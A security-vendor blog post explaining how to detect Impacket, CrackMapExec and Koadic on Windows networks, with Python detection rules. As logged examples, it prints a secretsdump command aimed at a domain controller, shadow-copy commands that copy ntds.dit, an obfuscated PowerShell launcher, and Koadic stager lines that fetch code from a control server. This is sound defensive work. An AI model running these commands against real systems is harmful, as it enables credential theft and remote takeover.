How to detect attacks on Windows infrastructure: exploring hacker tools

The number of attacks on the corporate sector grows every year: for example, 13% more unique incidents were recorded in 2017 than in 2016, and by the end of 2018 there were 27% more incidents than in the previous period. This includes attacks in which the main working tool is the Windows operating system. In 2017-2018 APT Dragonfly, APT28 and APT MuddyWater attacked government and military organizations in Europe, North America and Saudi Arabia, and they used three tools to do so: Impacket, CrackMapExec and Koadic. The source code of all three is open and available on GitHub.

It is worth noting that these tools are not used for initial penetration but for developing an attack inside the infrastructure: attackers use them at various stages after the perimeter has been breached. Such activity is hard to detect, and often only with technology that spots traces of compromise in network traffic or with tools that detect an intruder's active operations once he is already inside. The tools offer a range of functions, from file transfer to interacting with the registry and executing commands on a remote machine. We studied these tools to characterize their network activity.

What we needed to do:

  • Understand how the hacking tools work: what attackers need in order to use them and which technologies they rely on.
  • Find what information security tools miss in the first stages of an attack. The reconnaissance stage may be skipped, either because the attacker is an insider or because he exploits a flaw in the infrastructure that was not previously known. Detecting the subsequent movement makes it possible to reconstruct his entire chain of actions, hence the desire to detect it.
  • Eliminate false positives in intrusion detection tools. When certain actions are flagged on the basis of reconnaissance alone, frequent errors are possible, because an infrastructure usually offers plenty of ways, indistinguishable from legitimate ones at first glance, to obtain any piece of information.

What do these tools give attackers? In the case of Impacket, a large library of modules that can be used at different stages of an attack after the perimeter has been breached. Many tools use Impacket modules internally, Metasploit among them: its dcomexec and wmiexec modules for remote command execution and secretsdump for extracting credentials from memory are taken from Impacket. Consequently, correctly detecting the activity of this library also ensures detection of its derivatives.

About CrackMapExec (or simply CME), the creators wrote "Powered by Impacket" for a reason. In addition, CME has ready-made functionality for popular scenarios: Mimikatz for obtaining passwords or their hashes, injection of a Meterpreter or Empire agent for remote execution, and Bloodhound on board.

Our third tool of choice is Koadic. It is quite fresh: it was presented at the international hacker conference DEFCON 25 in 2017 and takes a non-standard approach, working through HTTP, JavaScript and Microsoft Visual Basic Script (VBS). This approach is called living off the land: the tool uses only dependencies and libraries built into Windows. Its creators call it COM Command & Control, or C3.

IMPACKET

Impacket's functionality is very wide, ranging from reconnaissance inside AD and collecting data from internal MS SQL servers to techniques for obtaining credentials: the SMB relay attack and retrieval of the ntds.dit file containing user password hashes from a domain controller. Impacket can also execute commands remotely in four different ways: via WMI, via the service that manages the Windows Task Scheduler, via DCOM and via SMB; all of them require credentials.

secretsdump

Let's take a look at secretsdump. This module can target both user machines and domain controllers. It obtains copies of the LSA, SAM and SECURITY hives and of NTDS.dit, so it can show up at different stages of an attack. The module's first step is authentication via SMB, which requires either the user's password or its hash in order to carry out a Pass-the-Hash attack automatically. Next comes a request to open the Service Control Manager (SCM) and gain access to the registry via the winreg protocol, through which the attacker can read the registry branches of interest and retrieve the results over SMB.

Fig. 1 shows how access to the LSA registry key is obtained via the winreg protocol, using the DCERPC call with opcode 15, OpenKey.

Fig. 1. Opening a registry key using the winreg protocol

Once access to the key is obtained, its values are saved with the SaveKey call (opcode 20). Impacket does this in a very specific way: it saves the values to a file whose name is a string of 8 random characters with .tmp appended. This file is then downloaded via SMB from the System32 directory (Fig. 2).

Fig. 2. Scheme for obtaining a registry key from a remote machine

It follows that such activity can be detected on the network by the winreg requests for particular registry branches, the characteristic file names, the calls used and their order.

This module also leaves traces in the Windows event log, which makes it easy to detect. For example, after executing the command

secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC

in the Windows Server 2016 log we will see the following key sequence of events:

1. 4624 - remote logon.
2. 5145 - access check on the winreg remote service.
3. 5145 - access check on a file in the System32 directory with the random name mentioned above.
4. 4688 - creation of a cmd.exe process that launches vssadmin:

"C:\windows\system32\cmd.exe" /Q /c echo c:\windows\system32\cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%\Temp\__output > %TEMP%\execute.bat & c:\windows\system32\cmd.exe /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat

5. 4688 - creating a process with the command:

"C:\windows\system32\cmd.exe" /Q /c echo c:\windows\system32\cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%\Temp\__output > %TEMP%\execute.bat & c:\windows\system32\cmd.exe /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat

6. 4688 - creating a process with the command:

"C:\windows\system32\cmd.exe" /Q /c echo c:\windows\system32\cmd.exe /C copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\Windows\NTDS\ntds.dit %SYSTEMROOT%\Temp\rmumAfcn.tmp ^> %SYSTEMROOT%\Temp\__output > %TEMP%\execute.bat & c:\windows\system32\cmd.exe /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat

7. 4688 - creating a process with the command:

"C:\windows\system32\cmd.exe" /Q /c echo c:\windows\system32\cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%\Temp\__output > %TEMP%\execute.bat & c:\windows\system32\cmd.exe /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat

Smbexec

Like many post-exploitation tools, Impacket has modules for remote command execution. We focus on smbexec, which gives an interactive command shell on a remote machine. This module also requires SMB authentication with either a password or its hash. Fig. 3 shows an example of the tool in operation, in this case a local administrator console.

Fig. 3. smbexec interactive console

After authentication, smbexec's first step is to open the SCM with the OpenSCManagerW (15) call. The request is notable for its MachineName field, which is set to DUMMY.

Fig. 4. Request to open Service Control Manager

Next, the service is created with the CreateServiceW (12) call. In the case of smbexec the command is built by the same logic every time. In Fig. 5, green marks the unchangeable parts of the command and yellow what the attacker can change. It is easy to see that the name of the executable, its directory and the output file can be changed, while the rest is much harder to alter without breaking the logic of the Impacket module.

Fig. 5. Request to create a service using Service Control Manager

Smbexec also leaves clear traces in the Windows event log. In the Windows Server 2016 log, an interactive shell in which the ipconfig command was run produces the following key sequence of events:

1. 4697 - installation of the service on the victim's machine:

%COMSPEC% /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat

2. 4688 - creation of the cmd.exe process with the arguments from item 1.
3. 5145 - access check on the __output file in the C$ share.
4. 4697 - installation of the service on the victim's machine:

%COMSPEC% /Q /c echo ipconfig ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat

5. 4688 - creation of the cmd.exe process with the arguments from item 4.
6. 5145 - access check on the __output file in the C$ share.
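The two event sequences above (secretsdump and smbexec) can be turned into log-side checks. The Python below is an added example, not Impacket's code or the authors' detection logic; the Event class and the sample records are constructed here to mirror the sequences the text describes.

```python
import re
from dataclasses import dataclass

@dataclass
class Event:
    """Minimal stand-in for a Security-log record (constructed; not the real event schema)."""
    event_id: int
    data: str   # 5145: relative target name; 4688: command line; 4697: service file name

# secretsdump saves each hive under an 8-letter random name plus .tmp and pulls it from System32
HIVE_TMP = re.compile(r"^(?:.*\\)?[A-Za-z]{8}\.tmp$")
# 4688 shape of the VSS steps: cmd /Q /c echo ... vssadmin ... ^> %SYSTEMROOT%\Temp\__output > %TEMP%\execute.bat
VSS_CMD = re.compile(
    r"/Q /c echo .*vssadmin (?:list|create|delete) shadows? .*\^> %SYSTEMROOT%\\Temp\\__output"
    r" > %TEMP%\\execute\.bat & .*%TEMP%\\execute\.bat & del %TEMP%\\execute\.bat", re.I)
# smbexec 4697 service binary; only the echoed command (group 1) is operator-chosen
SMBEXEC_SVC = re.compile(
    r"^%COMSPEC% /Q /c echo (.+?) \^> \\\\127\.0\.0\.1\\C\$\\__output 2\^>\^&1"
    r" > %TEMP%\\execute\.bat & %COMSPEC% /Q /c %TEMP%\\execute\.bat & del %TEMP%\\execute\.bat$", re.I)

def detect_secretsdump(events):
    """True when 4624 -> 5145(winreg) -> 5145(<8 letters>.tmp) -> 4688(vssadmin) occur in that order."""
    stage = 0
    for ev in events:
        if stage == 0 and ev.event_id == 4624:
            stage = 1
        elif stage == 1 and ev.event_id == 5145 and ev.data.lower() == "winreg":
            stage = 2
        elif stage == 2 and ev.event_id == 5145 and HIVE_TMP.match(ev.data):
            stage = 3
        elif stage == 3 and ev.event_id == 4688 and VSS_CMD.search(ev.data):
            return True
    return False

def smbexec_commands(events):
    """Recover the operator's commands from smbexec-style 4697 service installations."""
    found = []
    for ev in events:
        if ev.event_id == 4697:
            m = SMBEXEC_SVC.match(ev.data)
            if m:
                found.append(m.group(1))
    return found

# Constructed sample sequences following the Windows Server 2016 observations in the text.
SECRETSDUMP_LOG = [
    Event(4624, "contoso\\Administrator"),
    Event(5145, "winreg"),
    Event(5145, "SYSTEM32\\rmumAfcn.tmp"),
    Event(4688, r'"C:\windows\system32\cmd.exe" /Q /c echo c:\windows\system32\cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%\Temp\__output > %TEMP%\execute.bat & c:\windows\system32\cmd.exe /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat'),
]
SMBEXEC_LOG = [
    Event(4697, r"%COMSPEC% /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat"),
    Event(4688, "cmd.exe (arguments from the service above)"),
    Event(5145, "__output"),
    Event(4697, r"%COMSPEC% /Q /c echo ipconfig ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat"),
]
BENIGN_LOG = [Event(4624, "contoso\\svc_backup"), Event(4688, r"C:\Windows\System32\vssadmin.exe list shadows")]
```

A plain vssadmin run by a backup account does not trip the rule; it is the echo-to-execute.bat wrapper and the preceding winreg and .tmp accesses that identify the module.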

Impacket is the foundation for many attack tools. It supports almost all protocols found in a Windows infrastructure and at the same time has its own signatures: the specific winreg requests, the use of the SCM API with the characteristic command construction, the file-name format, and the retrieval of files from System32 over an SMB share.

CRACKMAPEXEC

The CME tool is designed primarily to automate the routine actions an attacker has to perform to advance within the network. It works in conjunction with the notorious Empire agent and Meterpreter. To execute commands unnoticed, CME can obfuscate them. With Bloodhound (a separate reconnaissance tool), an attacker can automate the search for an active domain administrator session.

Bloodhound

Bloodhound as a standalone tool allows advanced reconnaissance within the network. It collects data about users, machines, groups and sessions and comes as a PowerShell script or a binary. LDAP or SMB-based protocols are used to collect the information. The CME integration module downloads Bloodhound to the victim's machine, runs it and receives the collected data after execution, thereby automating the actions on the system and making them less noticeable. Bloodhound's graphical shell presents the collected data as graphs, which makes it possible to find the shortest path from the attacker's machine to the domain administrator.

Fig. 6. Bloodhound interface

To run on the victim's machine, the module creates a task via ATSVC over SMB. ATSVC is the interface to the Windows Task Scheduler; CME uses its NetrJobAdd (1) function to create jobs over the network. Fig. 7 shows what the CME module sends: a call to cmd.exe with obfuscated code passed as arguments in XML format.

Fig. 7. Creating a task via CME

Once the task has been submitted for execution, the victim's machine starts Bloodhound itself, and this is visible in the traffic. The module is characterized by LDAP queries for the standard groups and for a list of all machines and users in the domain, and by retrieval of active user sessions through the SRVSVC NetSessEnum request.

Fig. 8. Getting a list of active sessions via SMB

In addition, starting Bloodhound on a victim machine with auditing enabled produces an event with ID 4688 (process creation) and the process name "C:\Windows\System32\cmd.exe". Its command-line arguments are notable:

cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , … , 40,41 )-jOIN'' ) "
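The launcher above hides its intent behind two tricks: a character slice of $env:COMSPEC that resolves to the invoker, and a [char[]] array that is joined into the script text. The following Python is an added example (not CME's code) that flags this launcher shape and resolves both tricks on a host whose COMSPEC is assumed to be the stock value; the character array in the sample is constructed here and spells a harmless string, not the real payload.

```python
import re

# Launcher in the shape shown for CME's Bloodhound module (-noni -nop -w 1, an $env:COMSPEC
# slice and a [char[]] array). The array is constructed here and is not the real payload.
def build_sample():
    payload = "[Net.Sample]::Run()"
    arr = " , ".join(str(ord(c)) for c in payload)
    return ('cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & '
            "( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](" + arr + " )-jOIN'' ) \"")

ENV_SLICE = re.compile(r"\$env:(\w+)\[([\d,\s]+)\]\s*-join\s*''", re.I)
CHAR_ARRAY = re.compile(r"\[char\[\]\]\(\s*([\d,\s]+?)\s*\)\s*-join\s*''", re.I)

def resolve_env_slice(match, env):
    """$env:NAME[i,j,k] -join '' picks single characters out of an environment value."""
    value = env.get(match.group(1).upper(), "")
    picks = [int(i) for i in match.group(2).split(",")]
    return "".join(value[i] for i in picks if 0 <= i < len(value))

def decode_char_array(match):
    """[char[]](n1, n2, ...) -join '' rebuilds a string from code points."""
    return "".join(chr(int(n)) for n in match.group(1).split(","))

def is_cme_style_launcher(cmdline):
    """Hidden window, no profile, non-interactive, plus at least one of the two tricks."""
    c = cmdline.lower()
    flags = all(f in c for f in ("powershell", "-w 1", "-nop", "-noni"))
    return flags and ("$env:comspec[" in c or "[char[]](" in c)

def analyse(cmdline, env):
    """Return the launcher verdict and what the two tricks resolve to under `env`."""
    m_env = ENV_SLICE.search(cmdline)
    m_arr = CHAR_ARRAY.search(cmdline)
    return {
        "launcher": is_cme_style_launcher(cmdline),
        "invoker": resolve_env_slice(m_env, env) if m_env else None,
        "payload": decode_char_array(m_arr) if m_arr else None,
    }

# Assumed stock COMSPEC; characters 4, 26 and 25 of it read I, e, x.
HOST_ENV = {"COMSPEC": r"C:\WINDOWS\system32\cmd.exe"}

if __name__ == "__main__":
    print(analyse(build_sample(), HOST_ENV))
```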

enum_avproducts

The enum_avproducts module is very interesting in terms of both functionality and implementation. WMI allows the WQL query language to be used to get data from various Windows objects, which is essentially what this CME module does. It sends queries to the AntiSpywareProduct and AntiVirusProduct classes about the protection tools installed on the victim's machine. To get the required data, the module connects to the root\SecurityCenter2 namespace, issues a WQL query and receives the response. Fig. 9 shows the contents of such requests and responses. In our example, Windows Defender was found.

Fig. 9. Network activity of the enum_avproducts module

WMI auditing (the WMI-Activity trace log), whose events contain useful information about WQL queries, is often turned off. If it is enabled, running the enum_avproducts script produces an event with ID 11 containing the name of the user who submitted the query and the root\SecurityCenter2 namespace name.

Each of the CME modules has its own artifacts, whether specific WQL queries, the creation of a particular kind of Task Scheduler job with obfuscated arguments, or Bloodhound's characteristic activity in LDAP and SMB.

KOADIC

A distinctive feature of Koadic is its use of the JavaScript and VBScript interpreters built into Windows. In this sense it follows the living-off-the-land trend: it has no external dependencies and relies on standard Windows components. It is a full-fledged Command & Control (CnC) tool: after infection an "implant" is installed on the machine, allowing it to be controlled. Such a machine is called a "zombie" in Koadic terminology. If privileges on the victim side are insufficient for full operation, Koadic can escalate them using User Account Control bypass (UAC bypass) techniques.

Fig. 10. Koadic command shell

The victim must initiate communication with the Command & Control server. To do this, it needs to request a pre-prepared URI and receive the main Koadic body through one of the stagers. Fig. 11 shows an example for the mshta stager.

Fig. 11. Initialization of the session with the CnC server

From the WS variable in the response it is clear that execution happens through WScript.Shell, and the STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH and EXPIRE variables carry the key parameters of the current session. This is the first request-response pair of the HTTP connection to the CnC server. Subsequent requests relate directly to the functionality of the invoked modules (implants). All Koadic modules work only with an active CnC session.

Mimikatz

Just as CME works with Bloodhound, Koadic works with Mimikatz as a separate program and has several ways to run it. Below is the request-response pair for downloading the Mimikatz implant.

Fig. 12. Transfer of Mimikatz to Koadic

Notice how the format of the URI in the request has changed: it now carries a csrf variable, which selects the module. Pay no attention to its name; we all know that CSRF usually means something else. The response contains the same main Koadic body with Mimikatz-related code appended. It is quite large, so let's look only at the key parts: the base64-encoded Mimikatz library, the serialized .NET class that will inject it, and the arguments with which Mimikatz is run. The result of execution is sent over the network in clear text.

Fig. 13. The result of running Mimikatz on a remote machine

exec_cmd

Koadic also has modules that execute commands remotely. Here we see the same URI generation scheme and the familiar sid and csrf variables. In the case of the exec_cmd module, code capable of executing shell commands is appended to the body. The code below is what the CnC server returns in its HTTP response.

Fig. 14. Implant code of exec_cmd

The variable GAWTUUGCFI with the familiar WS attribute is required for code execution. Through it the implant invokes the shell along one of two code paths: shell.exec, which returns the output stream, and shell.run, which does not.

Koadic is not a typical tool, but it has its own artifacts by which it can be found in legitimate traffic:

  • characteristic formation of HTTP requests,
  • use of the WinHttpRequest API,
  • creation of a WScript.Shell object via ActiveXObject,
  • a large executable body.

The stager initiates the initial connection, so its activity can be detected through Windows events. For mshta this is event 4688, indicating the creation of a process with the launch attribute:

C:\Windows\system32\mshta.exe http://192.168.211.1:9999/dXpT6

While Koadic runs, other 4688 events appear with attributes that characterize it well:

rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:\Windows\system32\cmd.exe" /q /c chcp 437 & net session 1> C:\Users\user02\AppData\Local\Temp\6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:\Windows\system32\cmd.exe" /q /c chcp 437 & ipconfig 1> C:\Users\user02\AppData\Local\Temp\721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1
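The three 4688 command-line shapes listed above (mshta stager, rundll32 with sid/csrf, and the exec_cmd wrapper with a GUID-named output file) are enough for a process-creation rule. The Python below is an added example, not Koadic's code or the authors' detection logic; the regexes are ours, and the sample lines reuse the values from the text with the elided part of the rundll32 lines filled in by us.

```python
import re
from urllib.parse import urlsplit

# Process-creation (4688) command-line shapes listed in the text for Koadic.
STAGER_MSHTA = re.compile(r"^(?:\S*\\)?mshta\.exe\s+(https?://\S+)$", re.I)
STAGER_RUNDLL = re.compile(
    r"^rundll32\.exe\s.*?(https?://\S+?\?sid=[0-9a-f]{32};\s*csrf=[0-9a-f]{0,32})"
    r".*mshtml,RunHTMLApplication", re.I)
EXEC_CMD = re.compile(
    r'^"?[a-z]:\\windows\\system32\\cmd\.exe"?\s+/q /c chcp 437 & (.+?) 1> '
    r"(\S+\\Temp\\[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}\.txt) 2>&1$", re.I)

def session_params(url):
    """The Koadic URI joins sid and csrf with ';' rather than '&', so parse the query by hand."""
    pairs = (kv.strip().split("=", 1) for kv in urlsplit(url).query.split(";") if "=" in kv)
    params = dict(pairs)
    return {"sid": params.get("sid", ""), "csrf": params.get("csrf", "")}

def classify(cmdline):
    """Map one 4688 command line to the Koadic stage it reveals, or None."""
    m = STAGER_MSHTA.match(cmdline)
    if m:
        return {"kind": "stager_mshta", "url": m.group(1)}
    m = STAGER_RUNDLL.match(cmdline)
    if m:
        return {"kind": "stager_rundll32", **session_params(m.group(1))}
    m = EXEC_CMD.match(cmdline)
    if m:
        return {"kind": "exec_cmd", "command": m.group(1), "output": m.group(2)}
    return None

def scan(cmdlines):
    """Return only the lines that look like Koadic activity, in log order."""
    hits = []
    for line in cmdlines:
        hit = classify(line)
        if hit:
            hits.append(hit)
    return hits

# Sample 4688 command lines: values from the text, plus one constructed benign line.
SAMPLE_4688 = [
    r"C:\Windows\system32\mshta.exe http://192.168.211.1:9999/dXpT6",
    r"rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;mshtml,RunHTMLApplication",
    r"rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;mshtml,RunHTMLApplication",
    r'"C:\Windows\system32\cmd.exe" /q /c chcp 437 & net session 1> C:\Users\user02\AppData\Local\Temp\6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1',
    r'"C:\Windows\system32\cmd.exe" /q /c ipconfig',
]
```

The sid recovered from the rundll32 line ties later exec_cmd output files back to one CnC session, which is the pivot an analyst needs when reconstructing the chain.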

Conclusions

The living-off-the-land trend is gaining popularity among cybercriminals: they use Windows's built-in tools and mechanisms for their needs. We see the popular tools Koadic, CrackMapExec and Impacket, which follow this principle, appearing in APT reports more and more often. The number of forks of these tools on GitHub is also growing, and new ones keep appearing (there are already about a thousand now). The trend owes its popularity to simplicity: attackers do not need third-party tools; what they need is already on the victims' machines and helps bypass security measures. We focused on studying network interaction: each of the tools described above leaves its traces in network traffic, and their detailed study allowed us to teach our product, PT Network Attack Discovery, to detect them, which ultimately helps investigate the entire chain of cyber incidents in which they are involved.

Authors:

  • Anton Tyurin, Head of Expert Services Department, PT Expert Security Center, Positive Technologies
  • Egor Podmokov, expert, PT Expert Security Center, Positive Technologies

Source: habr.com